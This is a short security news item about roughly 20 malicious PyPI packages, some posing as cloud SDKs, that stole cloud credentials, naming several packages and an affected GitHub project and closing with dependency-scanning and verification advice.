Malicious PyPI packages have been discovered stealing cloud tokens, compromising thousands of users. Researchers found 20 harmful packages disguised as useful tools, tricking developers into installing them. These packages, downloaded over 14,100 times, targeted cloud service credentials from major platforms
A recent report identified two clusters of malicious PyPI packages. The first set included tools that uploaded stolen data to an attacker’s server. The second group imitated cloud client SDKs for services like Alibaba Cloud, AWS, and Tencent Cloud. Attackers also used “time”-themed packages to disguise their intentions. Fortunately, these harmful packages have been removed.
Further investigation revealed that three of these packages—acloud-client, enumer-iam, and tcloud-python-test—were dependencies of a popular GitHub project, accesskey_tools. This project had 42 forks and 519 stars, increasing the reach of these malicious packages. One of these dependencies, tcloud-python-test, had been available since November 8, 2023, accumulating 793 downloads.
Researchers also discovered that similar threats exist beyond PyPI. Thousands of suspicious packages in PyPI and npm contain hidden install scripts, allowing attackers to deploy malware or establish remote access. Some of these scripts use URLs linked to data exfiltration, additional malware downloads, or communication with command-and-control (C2) servers. These threats highlight the importance of securing open-source repositories.
How to Prevent
To protect against such attacks, developers must carefully inspect dependencies before installation. Verifying package sources, checking for unusual commit histories, and scanning for suspicious URLs can help prevent compromise. Organizations should also implement strict security policies, including dependency scanning tools and access controls, to reduce the risk of credential theft.
Sleep well, we got you covered.
